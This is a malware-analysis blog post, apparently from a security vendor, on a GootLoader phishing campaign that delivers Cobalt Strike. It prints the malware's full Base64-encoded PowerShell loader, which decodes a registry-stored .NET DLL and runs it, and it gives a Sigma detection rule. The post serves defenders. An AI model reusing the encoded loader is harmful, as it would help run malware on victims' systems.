\nAs an access-as-a-service malware, the GootLoader operators would be expected to sell direct access to compromised hosts and systems or provide buyers with harvested credentials and access points into a targeted network. A less frequent operation under this model might involve the GootLoader actors loading second-stage payloads as access brokers.<\/p>\n
Tracking the Campaign<\/h2>\n
We are observing and tracking an active exploitation campaign utilizing GootLoader against U.S. businesses in multiple industries and verticals. What we\u2019ve observed in this campaign is uniform deployment of Cobalt Strike payloads following exploitation and initial access provided by GootLoader. It\u2019s unknown if these Cobalt Strike payloads are used by GootLoader developers to provide direct access to an infected target or used to harvest credentials and other data which is brokered to a buyer for access or exploited in some other way. This GootLoader campaign begins its attack by phishing potential victims\u2019 business emails. Unlike other campaigns reported earlier in 2021 and 20224<\/sup>, this campaign has not yet been observed relying on specific SEO poisoning attacks to deliver its payload. We believe the payloads are also not being disguised as legitimate JQuery libraries as previously seen. Figure 1: The Attack Begins with a Malicious JavaScript file contained in a Zip Archive<\/em><\/p>\n The first stage in the campaign against a target is a simple phishing email. These emails have an attached Zip archive, which contains a JavaScript payload the victim is tricked in to running after opening. This JavaScript payload is executed by a Windows Operating System native binary, Windows Script Host (wscript.exe), which is a legitimate application typically used for logon scripts, administration, and automation and provides an execution environment in which the script can run. Our team believes that the JavaScript payload is delivered via a compressed archive to help mitigate detection by email and malware scanners.<\/p>\n Figure 2: JavaScript is executed by wscript.exe<\/em><\/p>\n GootLoader will then use this wscript.exe executing JavaScript to download an additional\u00a0 JavaScript resource which is loaded by the original calling wscript.exe process. This secondary exploitation payload is responsible for persisting two separate payloads.<\/p>\n Figure 3: wscript.exe retrieves payloads from Command and Control Server<\/em><\/p>\n GootLoader will use its secondary JavaScript payload to write two registry keys to the Window\u2019s Current User registry hive (HKCU). In this tracked campaign the two registry keys were stored in:<\/p>\n Figure 4: wscript.exe runs PowerShell to persist malware as a task, and writes encoded payloads to registry<\/em><\/p>\n After having saved the next two stages to the registry, the wscript.exe process will execute PowerShell to run PowerShell commands which will kick-off the first-stage malware implant. To help evade detection by security software, the executed PowerShell commands make use of multiple evasion techniques including<\/p>\n MwA1ADEANAA5ADcAOAA5ADsAcwBsAGUAZQBwACAALQBzACAANwA4ADsAJABqAHQAPQBHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBwAGEAdABoACAAKAAiAGgAawAiACsAIgBjAHUAOgBcAHMAbwBmACIAKwAiAHQAdwAiACsAIgBhAHIAZQBcAG0AaQBjACIAKwAiAHIAbwBzACIAKwAiAG8AZgB0AFwAUABoAG8AbgBlAFwAIgArAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6ACgAIgB1AHMAZQAiACsAIgByAG4AIgArACIAYQBtAGUAIgApACsAIgAwACIAKQA7AGYAbwByACAAKAAkAHMAdQBzAD0AMAA7ACQAcwB1AHMAIAAtAGwAZQAgADcAMAAwADsAJABzAHUAcwArACsAKQB7AFQAcgB5AHsAJABzAGEAKwA9ACQAagB0AC4AJABzAHUAcwB9AEMAYQB0AGMAaAB7AH0AfQA7ACQAcwB1AHMAPQAwADsAdwBoAGkAbABlACgAJAB0AHIAdQBlACkAewAkAHMAdQBzACsAKwA7ACQAawBvAD0AWwBtAGEAdABoAF0AOgA6ACgAIgBzAHEAIgArACIAcgB0ACIAKQAoACQAcwB1AHMAKQA7AGkAZgAoACQAawBvACAALQBlAHEAIAAxADAAMAAwACkAewBiAHIAZQBhAGsAfQB9ACQAaABpAHQAPQAkAHMAYQAuAHIAZQBwAGwAYQBjAGUAKAAiACMAIgAsACQAawBvACkAOwAkAGUAagB2AD0AWwBiAHkAdABlAFsAXQBdADoAOgAoACIAbgBlACIAKwAiAHcAIgApACgAJABoAGkAdAAuAEwAZQBuAGcAdABoAC8AMgApADsAZgBvAHIAKAAkAHMAdQBzAD0AMAA7ACQAcwB1AHMAIAAtAGwAdAAgACQAaABpAHQALgBMAGUAbgBnAHQAaAA7ACQAcwB1AHMAKwA9ADIAKQB7ACQAZQBqAHYAWwAkAHMAdQBzAC8AMgBdAD0AWwBjAG8AbgB2AGUAcgB0AF0AOgA6ACgAIgBUAG8AQgAiACsAIgB5AHQAZQAiACkAKAAkAGgAaQB0AC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAHMAdQBzACwAMgApACwAKAAyACoAOAApACkAfQBbAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwAiACsAIgBhAGQAIgApACgAJABlAGoAdgApADsAWwBPAHAAZQBuAF0AOgA6ACgAIgBUAGUAIgArACIAcwB0ACIAKQAoACkAOwA3ADQANAA0ADkAMQA3ADIAOwA=<\/p>\n<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n Decoding from Base64 and encoding with UTF-16LE we can see the commands contents:<\/p>\n Figure 5: Decoded PowerShell Command Loading Stage 1 Implant<\/em><\/p>\n This command will grab the contents of the first registry key, HKCU:\/SOFTWARE\/Microsoft\/phone\/$USERNAME0, decode the encoded .NET DLL it contains, and then run the Test() function contained in the DLL us as an execution start point.<\/p>\n To get the malware to drop the DLL unencoded for further analysis rather than directly loading and calling it via PowerShell, we modified the executed PowerShell command to write the contents to a file by appending the following before the last SLEEPfunction.<\/p>\n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 +> Set-Content $PATH -Value $ejv -Encoding Byte<\/p>\n This allowed us to analyze this first-stage implant to identify that the Test() function was being used to load the second-stage implant.<\/p>\n Figure 6: PowerShell.exe decodes the GootLoader implant which decodes and runs the secondary payload, Cobalt Strike<\/em><\/p>\n The second payload and malware implant used by GootLoader in this campaign is Cobalt Strike. The second registry key written in the earlier stage to HKCU:\\..Phone\\$USERNAME contains an encoded Cobalt Strike beacon. When the first-stage\u2019s Test() function is executed, it decodes, loads, and executes the Cobalt Strike beacon into memory.<\/p>\n To analyze the Cobalt Strike beacon we modified the retrieved first payload which loads the beacon, to instead write the beacon unencoded to disk for retrieval and analysis. We did this by adding additional library imports used for writing a file and adding a main function which will call the Test() loader.<\/p>\n Figure 7: Adding additional imports to 1st Stage Malware Implant<\/em><\/p>\n Figure 8: Adding function to call the 2nd Stage DLL\u2019s Test() function<\/em><\/p>\n We then created a BinaryWriter object and comment out some of the lines which would execute the Cobalt Strike beacon.<\/p>\n Figure 9: Modifying 1st stage to prevent 2nd stage execution and retrieve decoded 2nd<\/sup>\u00a0<\/span>stage<\/em><\/p>\n After building and running the code, we obtained the decoded second-stage Cobalt Strike payload.<\/p>\n Cobalt Strike is a paid penetration testing software which includes configurable malware implants that are often repurposed for use in real malware operations and infections. The\u00a0<\/span>Cobalt Strike beacon provides functionality<\/a>\u00a0<\/span>for the attacker including command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained[5]<\/sup>.Cobalt Strike has exploded in popularity<\/a>\u00a0<\/span>in usage by cyber-criminals[6]<\/sup>, and is a perfect launching platform for continued attacks or access transfer.<\/p>\n Once we had the decoded Cobalt Strike beacon written to disk, we were able to use public decoders to extract Cobalt Strike configuration information such as command and control addresses. We used the Python-based Cobalt Strike Configuration Extractor and Parser which can be found on GitHub,\u00a0<\/span>here<\/a>.<\/p>\n Figure 10: Decoded Cobalt Strike Beacon Payload<\/em><\/p>\n This allowed us to obtain the malware command and control infrastructure used by the attackers to control the Cobalt Strike implant.<\/p>\n Figure 11: Cobalt Strike is run and beacons to Cobalt Strike command and control server<\/em><\/p>\n Once the Adlumin Threat Visibility Team had the initial payload, follow-on implant stages, and leads on command-and-control infrastructure, we quickly created detections for our\u00a0<\/span>MDR platform,<\/a>\u00a0<\/span>which merges data from multiple security relevant data sources including the endpoint and installed security software. These detections caught subsequent attacks from the same campaign and identified some historical retroactive activity. Some key defenses and mitigations for the campaign include:<\/p>\n Additionally, our team is sharing the following indicators used in this campaign with the community:<\/p>\n We\u2019d also like to share the below\u00a0<\/span>Sigma<\/a>\u00a0<\/span>rule to help identify possible exploitation activity:<\/p>\n title: GootLoader Zipped JS WScript Make sure to follow N‑able for follow-up posts where we\u2019ll dive deeper into the actor\u2019s infrastructure and operations!<\/p>\n GootLoader malware targets US businesses with Cobalt Strike payloads, enabling access-as-a-service attacks. Learn campaign insights and protection tips here.<\/p>\n","protected":false},"author":24,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"inline_featured_image":false,"footnotes":""},"class_list":["post-70310","post","type-post","status-publish","format-standard","hentry","topic-cyber-resilience","topic-security"],"acf":[],"yoast_head":"\n
\nOur investigation is tracking an exploitation campaign which we defined based on:<\/strong><\/p>\n\n
Campaign Tactics, Techniques, and Procedures (TTPs)<\/h2>\n
\nIt starts with an email\u2026
\n![\"\"](\"https:\/\/adlumin.wpenginepowered.com\/wp-content\/uploads\/GootLoader_Image_1.png\")
<\/p>\n![\"GootLoader_Image_2\"](\"https:\/\/adlumin.wpenginepowered.com\/wp-content\/uploads\/GootLoader_Image_2.png\")
<\/p>\n![\"GootLoader_Image_3\"](\"https:\/\/adlumin.wpenginepowered.com\/wp-content\/uploads\/GootLoader_Image_3.png\")
<\/p>\nPersistence<\/h2>\n
\n
![\"GootLoader_Image_4\"](\"https:\/\/adlumin.wpenginepowered.com\/wp-content\/uploads\/GootLoader_Image_4.png\")
<\/p>\nKick-Off<\/h2>\n
\n
\n
![\"GootLoader_Image_5\"](\"https:\/\/adlumin.wpenginepowered.com\/wp-content\/uploads\/GootLoader_Image_5.png\")
<\/p>\nObtaining Decoded Stage-1<\/h2>\n
![\"GootLoader_Image_6\"](\"https:\/\/adlumin.wpenginepowered.com\/wp-content\/uploads\/GootLoader_Image_6.png\")
<\/p>\nSecond Stage Payload<\/h2>\n
![\"GootLoader_Image_7\"](\"https:\/\/adlumin.wpenginepowered.com\/wp-content\/uploads\/GootLoader_Image_7.png\")
<\/p>\n![\"GootLoader_Image_8\"](\"https:\/\/adlumin.wpenginepowered.com\/wp-content\/uploads\/GootLoader_Image_8.png\")
<\/p>\n![\"\"](\"https:\/\/adlumin.wpenginepowered.com\/wp-content\/uploads\/GootLoader_Image_9.png\")
<\/p>\nExtracting Campaign IOCs from Cobalt Strike<\/h2>\n
![\"\"](\"https:\/\/adlumin.wpenginepowered.com\/wp-content\/uploads\/GootLoader_Image_10.png\")
<\/p>\n![\"\"](\"https:\/\/adlumin.wpenginepowered.com\/wp-content\/uploads\/GootLoader_Image_11.png\")
<\/p>\nSummary & Future Reads<\/h2>\n
\n
\n
\nid: 37d82863-216a-41a3-a4de-b09cea08eb92
\naction: global
\nstatus: experimental
\nreferences:
\n\u2013 https:\/\/adlumin.com
\ndate: 2022\/09\/26
\ntags:
\n\u2013 attack.execution
\n\u2013 attack.t1059
\nauthor: Adlumin, Kyle Auer, Kevin O\u2019Connor
\ndetection:
\ncondition: selection
\nlevel: medium
\nlogsource:
\ncategory: process_execution
\nproduct: windows
\ndetection:
\nselection_1:
\nImage|endswith:
\n\u2013 \u2018\\powershell.exe\u2019
\nParentImage|endswith
\n\u2013 \u2018\\wscript.exe\u2019
\nselection_2:
\nImage|endswith:
\n\u2013 \u2018\\wscript.exe\u2019
\nselection_3:
\nCommandLine|all:
\n\u2013 \u2018*AppData*\u2019
\n\u2013 \u2018*zip*\u2019
\n\u2013 \u2018*.js*\u2019
\ncondition: (selection_1 or selection_2) and selection_3<\/p>\nResources:<\/h2>\n
\n